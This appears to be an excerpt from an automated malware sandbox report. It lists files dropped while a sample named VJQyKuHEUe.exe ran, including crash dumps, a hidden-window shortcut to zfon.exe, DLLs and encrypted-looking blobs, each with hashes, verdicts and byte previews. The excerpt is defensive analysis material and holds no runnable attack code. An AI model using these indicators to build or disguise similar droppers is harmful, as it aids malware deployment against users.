                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.0.0.<./.P.i.
                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):4613
                                                                                              Entropy (8bit):4.425463514110702
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:cvIwWl8zsEtJg771I9s/WpW8VYlYm8M4JB0KtFymyq85zVKulXyfd:uIjfEHI7fu7VRJ23mQJVyfd
                                                                                              MD5:E54A8235EF3585BF074B95900DDBB321
                                                                                              SHA1:243737723E2084F193000AE27144362CC7DB07B0
                                                                                              SHA-256:FF3E024F917F884A9D0BB5C019D45CA4CD4B157B7F60D3CC98C22B0441B72C13
                                                                                              SHA-512:346B1A4B73A134A1AF1E878B58CA0627F8A367B9DC38B495170082893FC8539A5C5B39E12E628C8FF889ABAB9EFD4892BB3BE88352C66EB1AB1589CED3ACC13E
                                                                                              Malicious:false
                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636669" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                              File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 12:06:23 2024, 0x1205a4 type
                                                                                              Category:dropped
                                                                                              Size (bytes):36336
                                                                                              Entropy (8bit):2.2996016815375953
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:NVkIKOmllOCXhZsiWpz/U3CtlWcuXpxKe21bFj:/02CXhz0Uyk5xKegBj
                                                                                              MD5:8FBA0A5D492E6EA6E59CC1E49D4CAA7D
                                                                                              SHA1:8E3A6DE7E9E51041F8DEC66AEA28823C57A84CC5
                                                                                              SHA-256:3DB047206EB7456A6B6C8CDDA2FD49FE45541B39D35012DB7AE994CAD35990E2
                                                                                              SHA-512:EB8836555E11DA57D0CA740610BDF7AE5C3B7F2BE9A531F6DD6BFD2DC93B248E53E9CFDFECED56AA6D79AC6106BEEC6CE991C7126F3E8499680DE91ECB67C3EE
                                                                                              Malicious:false
                                                                                              Preview:MDMP..a..... .........bg............4...............H.......<...`.......t....$..........`.......8...........T...........P...........................................................................................................eJ...... .......Lw......................T.............bg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):6488
                                                                                              Entropy (8bit):3.709069947997313
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:RSIU6o7wVetb+4eUYte9uxIZ5aMOUT89bPA1DZf0m9mm:R6l7wVeJ+4eUYte5pBT89b411f0mom
                                                                                              MD5:3E0BCB1C6118BC9F81E685E39ADA0150
                                                                                              SHA1:7262B0A35C7D56C6D2AF8A56795EB43D3A79D360
                                                                                              SHA-256:D40B0165429BD94F37C3C39D8315FF2EEF4C569778730CACFC4C5726F6D91072
                                                                                              SHA-512:8C615796384CBED82AEF897276C46A08811AB5C9B49F2577834C6099C3011E19972335048F812E25C91ECDCF8A8AA9C0C544BE65313DE6CBEDA19847B86FBED2
                                                                                              Malicious:false
                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.0.0.<./.P.i.
                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):4613
                                                                                              Entropy (8bit):4.421240870835798
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:cvIwWl8zsEtJg771I9s/WpW8VYjnYm8M4JB0KtFbqyq85zVKulXyfd:uIjfEHI7fu7Vw6J2yqQJVyfd
                                                                                              MD5:1EBC55DBD4AC08DC54E798794D41EA2D
                                                                                              SHA1:F71837E10D318E055C6DE8C1869309CB24FF199A
                                                                                              SHA-256:B2E7B975882FD053830C8BAF7870073081A236AA0074DDADE55EC1177E85F2A8
                                                                                              SHA-512:3BD86F2054BE7615A6655BF18C77C92291FDF7C991EF7644677225736B8A21E8E1515C7B55A3DD88D77F7FC373BABCFCCE580A0DC04DB2694C0F09B30A6B9664
                                                                                              Malicious:false
                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636669" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                              Process:C:\Windows\explorer.exe
                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Dec 18 11:05:38 2024, mtime=Wed Dec 18 11:06:19 2024, atime=Wed Dec 18 11:05:46 2024, length=2659840, window=hide
                                                                                              Category:dropped
                                                                                              Size (bytes):1072
                                                                                              Entropy (8bit):4.995563531030725
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:8mAbiGfxcYSegm2KwMSfSQZA7v4UVSU6FzbMUqygm:8m80e0MSfO1VSJlMdyg
                                                                                              MD5:30D2F001605639818A897A33962A4705
                                                                                              SHA1:2631DFCAF25836319BF006FA3A8CC91D8618BBE2
                                                                                              SHA-256:E4706B3F8B5654FF7077ECA7EF00EDFD1CCC05B1A49EEDA90BE72743033982AC
                                                                                              SHA-512:DAB695F522A86CBD81DBF2090D24879E6DE6C7495211881FA4D9BD50880725692F8D156299A791D61D84366FE297F44C8344A695B4AF6AE9BA11B7CD6D31AA6C
                                                                                              Malicious:false
                                                                                              Preview:L..................F.... ....3.'EQ..TOQ?EQ..g.+EQ....(.....................\.:..DG..Yr?.D..U..k0.&...&...... M......3.'EQ...o.AEQ......t...CFSF..1......Y.`..DOTA06~1....t.Y^...H.g.3..(.....gVA.G..k..........Y.`.Y.`..........................D.<.D.o.t.a.0.6.d.0.9.7.3.1.-.0.1.b.5.-.4.a.5.a.-.b.3.f.9.-.2.2.9.5.3.f.c.5.b.3.1.4...D.Z.2...(..Y.` .zfon.exe..B......Y.`.Y.`..........................._..z.f.o.n...e.x.e.......p...............-.......o...........:4a......C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe..D.....\.....\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.o.t.a.0.6.d.0.9.7.3.1.-.0.1.b.5.-.4.a.5.a.-.b.3.f.9.-.2.2.9.5.3.f.c.5.b.3.1.4.\.z.f.o.n...e.x.e...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.y.L.n.k.............:...........|....I.J.H..K..:...`.......X.......user-pc........hT..CrF.f4... ...~8....,...W..hT..CrF.f4... ...~8....,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3..
                                                                                              Process:C:\Windows\hh.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):30
                                                                                              Entropy (8bit):2.6616157143988106
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:tblM6lEjln:tbhEZn
                                                                                              MD5:AE50B29A0B8DCC411F24F1863B0EAFDE
                                                                                              SHA1:D415A55627B1ADED8E4B2CBBA402F816B0461155
                                                                                              SHA-256:6B4BBBCE480FBC50D39A8EC4B72CDB7D781B151921E063DD899FD9B736ADCF68
                                                                                              SHA-512:D9A9BA42D99BE32D26667060BE1D523DCD20EAFA187A67F7919002CC6DA349FD058053C9C6F721D6FDB730EA02FBAA3013E51C0C653368BD6B3F57A4C0FCABA8
                                                                                              Malicious:true
                                                                                              Preview:C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.
                                                                                              Process:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              File Type:ASCII text
                                                                                              Category:dropped
                                                                                              Size (bytes):21
                                                                                              Entropy (8bit):3.368042422572716
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:hMCEpFQkv:hur9
                                                                                              MD5:2D282102FA671256327D4767EC23BC6B
                                                                                              SHA1:E6C4FBD4FE7607F3E6EBF68B2EA4EF694DA7B4FE
                                                                                              SHA-256:649B8B471E7D7BC175EEC758A7006AC693C434C8297C07DB15286788C837154A
                                                                                              SHA-512:BF9BAC8036EA00445C04E3630148FDEC15AA91E20B753349D9771F4E25A4F68C82F9BD52F0A72CEAFF5415A673DFEBC91F365F8114009386C001F0D56C7015DE
                                                                                              Malicious:false
                                                                                              Preview:This is a test file..
                                                                                              Process:C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                                                              File Type:ASCII text
                                                                                              Category:dropped
                                                                                              Size (bytes):21
                                                                                              Entropy (8bit):3.368042422572716
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:hMCEpFQkv:hur9
                                                                                              MD5:2D282102FA671256327D4767EC23BC6B
                                                                                              SHA1:E6C4FBD4FE7607F3E6EBF68B2EA4EF694DA7B4FE
                                                                                              SHA-256:649B8B471E7D7BC175EEC758A7006AC693C434C8297C07DB15286788C837154A
                                                                                              SHA-512:BF9BAC8036EA00445C04E3630148FDEC15AA91E20B753349D9771F4E25A4F68C82F9BD52F0A72CEAFF5415A673DFEBC91F365F8114009386C001F0D56C7015DE
                                                                                              Malicious:false
                                                                                              Preview:This is a test file..
                                                                                              Process:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1119
                                                                                              Entropy (8bit):5.345080863654519
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                                                              MD5:88593431AEF401417595E7A00FE86E5F
                                                                                              SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                                                              SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                                                              SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                                                              Malicious:true
                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                              Process:C:\Windows\explorer.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):107416
                                                                                              Entropy (8bit):3.9981782829126855
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:Plz6k8GYwXW3jk0QDRcE+zvNuLxKNCjBlzTPieb6PR1vP1QlJd5m5oypQqW3/g+L:EkiwhRcE+zk5eJ+hOihGxnlpEFOdKQI
                                                                                              MD5:32773B997C44077752C165C577D857A9
                                                                                              SHA1:E58922A6F7DD3F2A9F3C551597E7EBCBDAE0BD7F
                                                                                              SHA-256:0BD726D433201127942D7B1779D4345ABBEED7AE196E908CFA5FA27E876EFE05
                                                                                              SHA-512:8937643C5966FDF45555C1ACE664DE97F777FD2CC42ACA19A66E5A8B5B0020AF233A525DA2AA61B133EF580505A882DD5554312F0B2FECFD71C7838B4F7107C7
                                                                                              Malicious:false
                                                                                              Preview:....h... .......`.......P...........`...X.......]...................8...V.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>...........................................
                                                                                              Process:C:\Windows\explorer.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):107416
                                                                                              Entropy (8bit):3.999081844772787
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:JlzckaGYwXW3jk0QDRcE+zvNuLxKNCjBlzTPieb6PR1vP1QlJd5m5oypQqW3/g+J:IkcwhRcE+zk5eJ+hOihGxnlpEFOdKQK
                                                                                              MD5:28763EA85BF6CE0DE5E358163A67053C
                                                                                              SHA1:3EA2C1B7F7FF27684428BF2C1E7B1DFD1907D049
                                                                                              SHA-256:DBC86AFEF8F743D4007A366558FC9DF1E1B277232E75369FA4FA861F84C80D29
                                                                                              SHA-512:CC9C9EF666DC7FD5446E355A0A9B21AC1541E45AA1239A176BDB71000118E1135F1A8821072159DF4A70BAB4C219631528BE385667C434D3A49C9B0340D03E36
                                                                                              Malicious:false
                                                                                              Preview:....h... .......`.......P...........`...X.......]...................8...V.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>...........................................
                                                                                              Process:C:\Windows\explorer.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):891
                                                                                              Entropy (8bit):5.2071251641562215
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:YWgc2CvLqZeH+avLqZ/uQBmwAkA53c27fyfH+2yrZMAdrKC8K/y8kEhq1HLxycXl:Yzc2CTDH9TCJAkC3c2IHt0drc6hE1opM
                                                                                              MD5:AC9F07C35AFD29813A45167DDD632507
                                                                                              SHA1:43D72AF268B5D47EBEE4AD5C6A755F0CB15F6A5B
                                                                                              SHA-256:0F612F484CCF090D4B8545A0F762BD201C05F4DA38B7940C7C85046FC8203137
                                                                                              SHA-512:C99AA7ED42FFC70DB771FC376389C34392D18C52B5458967B53476FFC63D4C3B0AAFF1652E84E6FCB8ECF5DA248D662EE1DC4C157496BA1BF76BD4A067E7DFC6
                                                                                              Malicious:false
                                                                                              Preview:{"serviceContext":{"serviceActivityId":"4cb3b434-acee-4f79-bce5-b76561184c32","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"4cb3b434-acee-4f79-bce5-b76561184c32|2024-12-18T12:06:31.8595060Z|fabric_msn|EUS2-A|News_811","tier":"\u0000","clientActivityId":"A16F1333-918E-4891-9D0E-CB5A1C05777F"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false,"1SlockscreenContentEnabled":true,"setMUIDOnMultipleDomains":false},"isPartial":false}
                                                                                              Process:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):627992
                                                                                              Entropy (8bit):6.360523442335369
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:dO93oUW7jh6DN0RUhsduQjqDZ6X/t5mTOKGmJ7DseBiltBMQEKZm+jWodEEVoFt:s3oUW7jh6DN0RUhsduQjqDZ6X/t5mTOo
                                                                                              MD5:C1B066F9E3E2F3A6785161A8C7E0346A
                                                                                              SHA1:8B3B943E79C40BC81FDAC1E038A276D034BBE812
                                                                                              SHA-256:99E3E25CDA404283FBD96B25B7683A8D213E7954674ADEFA2279123A8D0701FD
                                                                                              SHA-512:36F9E6C86AFBD80375295238B67E4F472EB86FCB84A590D8DBA928D4E7A502D4F903971827FDC331353E5B3D06616664450759432FDC8D304A56E7DACB84B728
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: nrGkqbCyKP.exe, Detection: malicious, Browse
                                                                                              • Filename: sxVHUOSqVC.exe, Detection: malicious, Browse
                                                                                              • Filename: R0SkdJNujW.exe, Detection: malicious, Browse
                                                                                              • Filename: drivers.exe, Detection: malicious, Browse
                                                                                              • Filename: GameBoxMini.exe, Detection: malicious, Browse
                                                                                              • Filename: drivers.exe, Detection: malicious, Browse
                                                                                              • Filename: RQoBY766F5.exe, Detection: malicious, Browse
                                                                                              • Filename: RQoBY766F5.exe, Detection: malicious, Browse
                                                                                              • Filename: , Detection: malicious, Browse
                                                                                              • Filename: RemotePCViewer.exe, Detection: malicious, Browse
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`..r$..!$..!$..!.O.!&..!-.|!2..!v.. '..!$..!...!v.. '..!v.. o..!v.. j..!v.. %..!v..!%..!v.. %..!Rich$..!................PE..d.....0].........." .........`...... ...............................................T.....`A............................................h....................0..t@...T...A..............8............................................ ..........@....................text...<........................... ..`.rdata..<.... ......................@..@.data....;..........................@....pdata..t@...0...B..................@..@.didat..h............B..............@....rsrc................D..............@..@.reloc...............H..............@..B................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):119376
                                                                                              Entropy (8bit):6.605105564769165
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:BqvQFDdwFBHKaPX8YKpWgeQqbekRG7MP4ddbHecbWcmpCGtodMzDZ92zfa:BqvQFDUXqWn7CkRG7jecbWb9toaera
                                                                                              MD5:E9B690FBE5C4B96871214379659DD928
                                                                                              SHA1:C199A4BEAC341ABC218257080B741ADA0FADECAF
                                                                                              SHA-256:A06C9EA4F815DAC75D2C99684D433FBFC782010FAE887837A03F085A29A217E8
                                                                                              SHA-512:00CF9B22AF6EBBC20D1B9C22FC4261394B7D98CCAD4823ABC5CA6FDAC537B43A00DB5B3829C304A85738BE5107927C0761C8276D6CB7F80E90F0A2C991DBCD8C
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.... ............" ...&. ...d.......................................................:....`A.........................................e..4...4m..........................PP...........N..p............................L..@............0...............................text...V........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              File Type:PNG image data, 605 x 390, 8-bit/color RGB, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):660160
                                                                                              Entropy (8bit):7.996422927525233
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:tiTfEJiX3KaRppbIa6QJKuI+tdwh0b+ngpZfPd78cnFICTQLgMGatwJtiy9:WX3Ke5xI+ttqngpRD+CipGatwx
                                                                                              MD5:0CA6A22E9FEADB18C76712B5B0256B96
                                                                                              SHA1:46A678DCB5FC076816165DA255AB237D027975FB
                                                                                              SHA-256:8A8D9DD1DDDCA28A9063E828B1F8CE35D6DDC68692C988DA79BA957FDBC0035A
                                                                                              SHA-512:19B7754408DC79610B4447F6B7C55F9863378ECFD60A7496366DAA5CA4032DD0B2A0FD656D8112069D5385C45B57617C8B7B288BCDBCEB85BAB01FF44FB7D498
                                                                                              Malicious:false
                                                                                              Preview:.PNG........IHDR...]................pHYs...%...%.IR$.....tEXtSoftware.Snipaste]..... .IDATx..W.$;.%..={...b.2.p.....+.euO1_.07..Ah*........#D "b&"&.G"".c.1@...>33.~%".j&....{eK../.ML..9...t..5.3.Hd... ..[.....i..T..]... &f.....L..cP.OG...%.......>....D..g"..W.gV.. ..""..1+.^.....{T.......J...>.!.....yq.N../..f.6../...4.EL{0.@7L"F.(ha.y.A..1V....B.L.V..g.D..vs..<t ..'..~`.q!.*.p!$.zD$d.IB...Y.~..B......>...w......9...`..<..EA.....0./....`....BoI..^p!.h....h.<..*...Ls%..g.\.C.i~,.|Uh.VTq.1F.7..{-.6..-.....I....Z.*..%)C.\l\.yoX.KT.....?..k.......9....r..>l.......Z5?..+.\.P1.....!...L6....'.( ....33.$$.......h..1Q.r.e4...IhFI.Z........"d .^.0q.KQ..j..W........#....W..D..0K..h...K.........#MqW3]...\q{..*....R.m...H..."..a6O...pNs._N.......I1.@Nc.}.W0}.... b83.2.b...c.......jod5<F.o@5..Wc.4.Ekr.e.?dXb. .H=..PFU,..(..4....D.uk!lp.P.....(E}.r.......<.9.?.}.....i(.....t.&x.`_e..}./.i.SZ.....;..md'X._...Q..........j..:.G...../6...H..DJ......k..`.a.9..
                                                                                              Process:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 244397152
                                                                                              Category:dropped
                                                                                              Size (bytes):271126
                                                                                              Entropy (8bit):1.6290509027122977
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:62OeAYrjCbBn/J91NhFz6PWUaoolBso6lTqx2Y:6Dlp/T1NhJ6UB1fx2Y
                                                                                              MD5:D7B50924AB14320B946526EB3DB6A08F
                                                                                              SHA1:C114B1C3106C533E40470BE319094810670FE3BF
                                                                                              SHA-256:42719113D64459DBF01EADA16DE0723BD0EEF888E25A76C69306F122B2C66BE1
                                                                                              SHA-512:C39E877CE350977826793E6298FD93013846EE934CBCE639F16DCFBC91188AFF89C7F6C87C90A2A0B2A050627387C80C6354480F8E5655234EBBD7A8FD106449
                                                                                              Malicious:false
                                                                                              Preview:............|T....f...%...P;j... ...H....!HD4...&.q...A..8Fc..]\..Z[[j}...D%(*...T.....wl...~.9..%...{.....y.{....Y...%="C..I*..b.Px....".[.e...<{.fG..T7.....y....P.........H....]6......8b.....[.....x.T..|.=t.....+..|.uy....M..|S....?I..K{..>%....&]G..:.....5C>/hih.p..VU.D......z...a........zK/..\i..!..S.A.y.E7d.L&2D..td^R.....b.B....u.yC.^....o...[=.u...!..#..!J.Rf.l.i..^...'.}.a..6..i.L....nb..>\O..<..8.I.....5..L...n.t}!.^...(.Hi.C........`...<....o...k...j.amoo.......l....vU.dy;./.F+...}...hYA.7.g..g>t>Q.m.......G......G%:....}....\......?..ZWp3.l/+p.irm..##..=tI...l.&....d..1....J...^^C..{...z...........l.d......."Y."I7.I.p.r.}m.....#.%XO..#D...{#.....I....8....... .%.d|/U.....u.......Bo.OE...B.s...P..;y......m>z.*......~eA],.C.j.E`.]=Fm..(.vW.x...eFk.Nvx.-...}.X."...C(.3u.....(+.G.9....0...4.....&C.Y.....+en..z....upn..hv...Rf.G..*.I..F..V%.V.q....A.-~A...+....<1......j/W.RN.o............[...Lr...n...g..{......|}N..8.....
                                                                                              Process:C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
